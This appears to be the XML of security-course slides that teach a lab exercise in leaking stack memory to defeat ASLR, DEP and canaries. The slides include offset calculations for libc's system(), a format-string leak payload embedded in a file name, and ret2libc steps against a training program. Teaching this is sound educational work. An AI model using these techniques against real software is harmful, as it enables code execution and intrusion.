                    <a:pt x="361950" y="60323"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="369303" y="48165"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="423765" y="26595"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="467962" y="17668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="521530" y="10302"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="583012" y="4740"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="650954" y="1225"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="723900" y="0"/>
                  </a:lnTo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7" name="Google Shape;1007;g24e5311e72c_0_836"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2536189" y="3585450"/>
            <a:ext cx="16155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925">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="12700" marR="508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Georgia"/>
                <a:ea typeface="Georgia"/>
                <a:cs typeface="Georgia"/>
                <a:sym typeface="Georgia"/>
              </a:rPr>
              <a:t>This is the C Library loaded at a random place in memory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8" name="Google Shape;1008;g24e5311e72c_0_836"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7284463" y="2391725"/>
            <a:ext cx="10908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A: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Georgia"/>
                <a:ea typeface="Georgia"/>
                <a:cs typeface="Georgia"/>
                <a:sym typeface="Georgia"/>
              </a:rPr>
              <a:t>start_main()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12700" marR="26033" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="116666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Georgia"/>
                <a:ea typeface="Georgia"/>
                <a:cs typeface="Georgia"/>
                <a:sym typeface="Georgia"/>
              </a:rPr>
              <a:t>offset from beginning of C Library module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009" name="Google Shape;1009;g24e5311e72c_0_836"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8401050" y="2407599"/>
            <a:ext cx="431800" cy="2119292"/>
            <a:chOff x="7334250" y="1874199"/>
            <a:chExt cx="431800" cy="2119292"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="1010" name="Google Shape;1010;g24e5311e72c_0_83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334250" y="1874199"/>
              <a:ext cx="431800" cy="21192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1" name="Google Shape;1011;g24e5311e72c_0_836"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7372350" y="1904999"/>
              <a:ext cx="342900" cy="2018029"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="2018029" w="342900">
                  <a:moveTo>
                    <a:pt x="0" y="2017692"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="66736" y="2015446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121233" y="2009323"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157976" y="2000240"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="171450" y="1989118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="171450" y="1037419"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184923" y="1026297"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221666" y="1017215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="276163" y="1011091"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="342900" y="1008845"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="276163" y="1006600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221666" y="1000476"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184923" y="991394"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="171450" y="980272"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="171450" y="28573"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157976" y="17451"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121233" y="8369"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66736" y="2245"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo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2" name="Google Shape;1012;g24e5311e72c_0_836"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8919386" y="3015042"/>
            <a:ext cx="12441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B: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Georgia"/>
                <a:ea typeface="Georgia"/>
                <a:cs typeface="Georgia"/>
                <a:sym typeface="Georgia"/>
              </a:rPr>
              <a:t>system()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12700" marR="5080" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114285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en-US" sz="1400">
                <a:latin typeface="Georgia"/>
                <a:ea typeface="Georgia"/>
                <a:cs typeface="Georgia"/>
                <a:sym typeface="Georgia"/>
              </a:rPr>
              <a:t>offset from beginning of C Library module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3" name="Google Shape;1013;g24e5311e72c_0_836"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7432040" y="5210571"/>
            <a:ext cx="2302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B - A = </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1800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static offset from start_main to system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24e5311e72c_0_870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Finding Dynamic system() Address</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1020" name="Google Shape;1020;g24e5311e72c_0_870"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731300" y="1825625"/>
            <a:ext cx="11391900" cy="47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Get system() address static offset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libc_system@@GLIBC_2.0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readelf -s /lib/i386-linux-gnu/libc.so.6 | grep “system”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Consolas"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US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0x0003adb0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Get main() return address static offset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main() will return to somewhere in the libc_start_main()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libc_start_main() address + a few instructions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gdb /lib/i386-linux-gnu/libc.so.6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(gdb) disassemble __libc_start_main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○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x00018647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Calculate “start_main to system” offset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[system offset] - [start_main offset] = [start_main to system offset]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-US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0x0003adb0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-US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0x00018647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0x00022769</a:t>
            </a:r>
            <a:endParaRPr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24e5311e72c_0_876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Finding Dynamic system() Address</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1027" name="Google Shape;1027;g24e5311e72c_0_87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Find dynamic “main() return” address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Use memory leak to reveal this information from the stack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Hint: Search stack for return address next to argc and argv* parameters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Example: 0xb7e20647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Calculate dynamic system() address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[dynamic main() ret] + [0x00022769] = [dynamic system()]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0xb7e20647 + 0x00022769 = 0xb7e42db0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Note: static (No ASLR) values shown in calculation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24e5311e72c_0_882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memcor/readBinaryData1</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1034" name="Google Shape;1034;g24e5311e72c_0_882"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2590223" y="2447163"/>
            <a:ext cx="8458776" cy="1233964"/>
            <a:chOff x="456623" y="2142363"/>
            <a:chExt cx="8458776" cy="1233964"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="1035" name="Google Shape;1035;g24e5311e72c_0_88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6623" y="2142363"/>
              <a:ext cx="8458776" cy="12339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6" name="Google Shape;1036;g24e5311e72c_0_882"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="936285" y="2919128"/>
              <a:ext cx="914400" cy="228600"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="2286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AD4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7" name="Google Shape;1037;g24e5311e72c_0_882"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2746253" y="4953129"/>
            <a:ext cx="990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Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Canary Value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8" name="Google Shape;1038;g24e5311e72c_0_882"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4921147" y="3223928"/>
            <a:ext cx="1846643" cy="240145"/>
            <a:chOff x="2787547" y="2919128"/>
            <a:chExt cx="1846643" cy="240145"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1039" name="Google Shape;1039;g24e5311e72c_0_882"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2787547" y="2919128"/>
              <a:ext cx="914400" cy="228600"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="2286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AD4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g24e5311e72c_0_882"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3719790" y="2930673"/>
              <a:ext cx="914400" cy="228600"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="2286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AD4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1" name="Google Shape;1041;g24e5311e72c_0_882"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3951681" y="1803463"/>
            <a:ext cx="18561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Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Return address to main()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1042;g24e5311e72c_0_882"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7119620" y="4260620"/>
            <a:ext cx="19788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Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Address of fileName string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3" name="Google Shape;1043;g24e5311e72c_0_882"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3357713" y="2084133"/>
            <a:ext cx="4681750" cy="2868898"/>
            <a:chOff x="1224113" y="1779333"/>
            <a:chExt cx="4681750" cy="2868898"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1044" name="Google Shape;1044;g24e5311e72c_0_882"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1224113" y="3160427"/>
              <a:ext cx="156209" cy="1487804"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="1487804" w="156209">
                  <a:moveTo>
                    <a:pt x="0" y="1487771"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="156050" y="0"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln cap="flat" cmpd="sng" w="28575">
              <a:solidFill>
                <a:srgbClr val="0AD4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g24e5311e72c_0_882"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2915839" y="1779333"/>
              <a:ext cx="295910" cy="1127125"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="1127125" w="295910">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="295598" y="1127095"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln cap="flat" cmpd="sng" w="28575">
              <a:solidFill>
                <a:srgbClr val="0AD4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g24e5311e72c_0_882"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4418059" y="3171973"/>
              <a:ext cx="1487804" cy="784225"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="784225" w="1487804">
                  <a:moveTo>
                    <a:pt x="1487637" y="783718"/>
                  </a:move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rgbClr val="0AD4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g24e5311e72c_0_882"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2796468" y="3153501"/>
              <a:ext cx="914400" cy="228600"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="2286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AD4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8" name="Google Shape;1048;g24e5311e72c_0_882"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5480588" y="5577472"/>
            <a:ext cx="2286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Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Return address to start_main()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g24e5311e72c_0_882"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5475447" y="3699601"/>
            <a:ext cx="1304289" cy="1878329"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="1878329" w="1304289">
                <a:moveTo>
                  <a:pt x="1303754" y="1877743"/>
                </a:move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rgbClr val="0AD41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24e5311e72c_0_904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Exercise: memcor/ReadBinaryData1</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1056" name="Google Shape;1056;g24e5311e72c_0_90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Objective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Defeat DEP, Canaries and ASLR by leveraging an information leak in a buffer overflow exploit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Procedure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enable ASLR and compile program with DEP and Canaries enabled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sudo sysctl kernel.randomize_va_space=1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make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Name your </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> file with a string  that contains your command and exploits the memory leak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“bash;%08x.%08x….%08x”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Execute program to trigger memory leak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./readBinaryData1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bash;%08x.%08x….%08x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○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Calculate the address of system()</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FF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Update file with “informed” ret2libc exploit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Continue program execution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“Press any key to continue”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24e5311e72c_0_910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Congratulations!</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1063" name="Google Shape;1063;g24e5311e72c_0_9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You successfully defeated all modern defenses that protect software from buffer overflows!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24e5311e72c_0_916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Review</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1070" name="Google Shape;1070;g24e5311e72c_0_9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buffer overflow occurs when you writer data larger than a destination buffer can handle.  The overflow data can be skillfully crafted to overwrite data and modify the execution of a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Functions </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>which</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> perform delimiter-based copy operations are prime suspects for vulnerabilities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scanf(), strcpy(), strcat(), sprintf(), vsprintf(), gets(), getline()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Manually coded copy operations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Copy operations which derive data size from user input are likely suspects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All functions that read or write data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24e5311e72c_0_922"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="308565"/>
            <a:ext cx="10515600" cy="8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Review</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1077" name="Google Shape;1077;g24e5311e72c_0_9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buffer overflow occurs when we attempt to write more data to a destination buffer than it can handle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 vulnerability is present on delimiter-based copy operations that do not perform proper bounds checking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modern-day protection mechanisms increase the difficulty of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>exploiting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>vulnerabilities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DEP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Nullify shellcode inserted into the buffer/stack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Canaries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Check integrity of data on the stack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ASLR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Decreases odds of guessing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> variables in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Protection mechanisms come </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> a performance cost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ASLR and DEP are implemented in hardware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2022-06-13T13:28:45Z</dcterms:created>
  <dc:creator>Joe</dc:creator>
</cp:coreProperties>
</file>